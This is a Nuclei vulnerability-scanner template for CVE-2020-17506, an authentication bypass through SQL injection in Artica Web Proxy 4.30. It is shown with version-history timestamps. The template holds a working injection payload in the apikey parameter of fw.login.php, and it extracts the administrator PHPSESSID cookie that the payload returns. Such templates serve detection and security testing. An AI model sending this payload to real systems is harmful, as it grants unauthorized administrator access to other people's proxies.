nuclei-templates/http/cves/2020/CVE-2020-17506.yaml

58 lines
1.7 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-17506
2020-08-20 15:11:34 +00:00
info:
name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
2020-08-20 15:11:34 +00:00
author: dwisiswant0
severity: critical
2020-08-25 22:43:40 +00:00
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506
- http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html
- https://blog.max0x4141.com/post/artica_proxy/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-17506
cwe-id: CWE-89
2023-08-31 11:46:18 +00:00
epss-score: 0.96091
epss-percentile: 0.9927
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: articatech
product: web_proxy
tags: cve,cve2020,artica,proxy,packetstorm
2020-08-20 15:11:34 +00:00
http:
2020-08-20 15:11:34 +00:00
- method: GET
path:
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
host-redirects: true
max-redirects: 1
2023-07-11 19:49:27 +00:00
2020-08-20 15:11:34 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "artica-applianc"
2023-07-11 19:49:27 +00:00
- type: word
part: header
words:
- "PHPSESSID"
2020-08-20 15:11:34 +00:00
- type: status
status:
- 200
- 301
- 302
condition: or
2020-08-20 15:11:34 +00:00
extractors:
- type: kval
kval:
2020-08-25 22:43:40 +00:00
- "PHPSESSID"